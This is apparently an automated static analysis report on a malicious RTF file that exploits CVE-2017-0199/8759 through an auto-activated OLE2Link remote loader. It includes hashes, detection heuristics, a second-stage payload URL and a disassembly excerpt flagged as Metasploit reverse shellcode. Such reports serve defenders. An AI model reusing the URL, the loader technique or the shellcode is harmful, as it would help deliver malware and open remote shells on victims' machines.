Malicious RTF — malware analysis report

Static analysis result for SHA-256 08ac832caf0a1ea6…

MALICIOUS

RTF

Size: 779.4 KB
Created: 2017-11-20 19:24:00
First seen: 2017-12-08
MD5: d7993336e0a397aabf3cabb8bbec800b
SHA-1: ccdde5b185fb850e873d7d7116e625b5aebf8436
SHA-256: 08ac832caf0a1ea6b73f27d62ab4dcdbbad882b659869f2814f837c73c9e4ac0
Risk score: 402

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution

The RTF file contains OLE object data that triggers remote content loading, specifically exploiting CVE-2017-0199 or CVE-2017-8759. This mechanism is designed to download and execute a secondary payload from the URL http://kinesk.com/t/t.php?stats=send&thread=2. Metasploit reverse shellcode was also detected, indicating the likely intent to establish a reverse shell connection.

Heuristics (11)

  • [critical] CVE-2017-0199 / CVE-2017-8759 (OLE2Link auto-activated remote loader), tag: CVE related, rule: RTF_OLE2LINK_REMOTE_MONIKER_LOADER
    RTF embeds an OLE2Link object that is force-activated with \objupdate (no user interaction on open) and fetches a remote second stage through an INCLUDETEXT/INCLUDEPICTURE field. This is the field-delivered OLE2Link auto-update attack path shared by CVE-2017-0199 (server returns an HTA/scriptlet) and CVE-2017-8759 (server returns a SOAP WSDL the .NET parser compiles). Office processes the fetched response through the same code path; the specific CVE depends on the now-unreachable server content type.
  • [critical] ClamAV: Rtf.Downloader.CVE_2017-6336326-3, rule: CLAMAV_DETECTION
    ClamAV detected this file as malware: Rtf.Downloader.CVE_2017-6336326-3
  • [critical] Metasploit reverse_tcp shellcode, rule: SC_MSF_REVERSE
    Metasploit reverse_tcp shellcode
    Disassembly
    Attempted x86 opcode disassembly
    00066CE3  fc                cld
    00066CE4  e882000000        call 0x66d6b
    00066CE9  5f                pop edi
    00066CEA  5e                pop esi
    00066CEB  5b                pop ebx
    00066CEC  8be5              mov esp, ebp
    00066CEE  5d                pop ebp
    00066CEF  c3                ret
    00066CF0  8d4000            lea eax, [eax]
    00066CF3  53                push ebx
    00066CF4  56                push esi
    00066CF5  8bd8              mov ebx, eax
    00066CF7  3b5324            cmp edx, dword ptr [ebx + 0x24]
    00066CFA  7436              je 0x66d32
    00066CFC  8bf2              mov esi, edx
    00066CFE  85f6              test esi, esi
    00066D00  7518              jne 0x66d1a
    00066D02  33c0              xor eax, eax
    00066D04  8a4318            mov al, byte ptr [ebx + 0x18]
    00066D07  8b048594cd4600    mov eax, dword ptr [eax*4 + 0x46cd94]
    00066D0E  50                push eax
    00066D0F  a138374700        mov eax, dword ptr [0x473738]
    00066D14  8b00              mov eax, dword ptr [eax]
    00066D16  ffd0              call eax
    00066D18  8bd0              mov edx, eax
    00066D1A  895324            mov dword ptr [ebx + 0x24], edx
    00066D1D  c6434401          mov byte ptr [ebx + 0x44], 1
    00066D21  8b4304            mov eax, dword ptr [ebx + 4]
    00066D24  e8ba060000        call 0x673e3
    00066D29  85f6              test esi, esi
    00066D2B  7505              jne 0x66d32
    00066D2D  33c0              xor eax, eax
    00066D2F  894324            mov dword ptr [ebx + 0x24], eax
    00066D32  5e                pop esi
    00066D33  5b                pop ebx
    00066D34  c3                ret
    00066D35  8bc0              mov eax, eax
    00066D37  3b5028            cmp edx, dword ptr [eax + 0x28]
    00066D3A  7413              je 0x66d4f
    00066D3C  895028            mov dword ptr [eax + 0x28], edx
    00066D3F  c6402c00          mov byte ptr [eax + 0x2c], 0
  • [high] Reference to LoadLibrary API, rule: SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • [high] Reference to GetProcAddress API, rule: SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • [high] \objupdate forces OLE activation, rule: RTF_OBJUPDATE
    RTF contains \objupdate — forces automatic OLE object instantiation when the document is opened, bypassing user interaction. Almost exclusively seen in Equation Editor exploit documents.
  • [high] INCLUDETEXT/INCLUDEPICTURE remote URL, rule: RTF_INCLUDE_REMOTE
    RTF document uses INCLUDETEXT or INCLUDEPICTURE with an http:// URL. Word can fetch the remote content on open depending on Office version and external-content settings, enabling remote template injection, NTLM capture via redirects, or payload delivery.
  • [medium] Reference to VirtualAlloc API, rule: SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • [medium] Reference to VirtualProtect API, rule: SC_STR_VIRTUALPROTECT
    Reference to VirtualProtect API
  • [medium] OLE object data, rule: RTF_OBJDATA
    RTF contains 2 \objdata section(s) — embedded OLE objects
  • [info] Embedded URL, rule: EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://kinesk.com/t/t.php?stats=send&thread=2 (found in RTF body)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size | SHA-256
objdata_00_off0000c568.bin | rtf-objdata-decoded | RTF \objdata at offset 0xC568 | 2598 bytes | 831d653a8bf6b35f70c34b8f0aa9b4deff313b9e99f06c2a160f156cfbe686ed
objdata_01_off0000dc96.bin | rtf-objdata-decoded | RTF \objdata at offset 0xDC96 | 2674 bytes | b2d1dcd53ab72d489708eb5449a9c003c690279daf375b527c7e12791399d9fe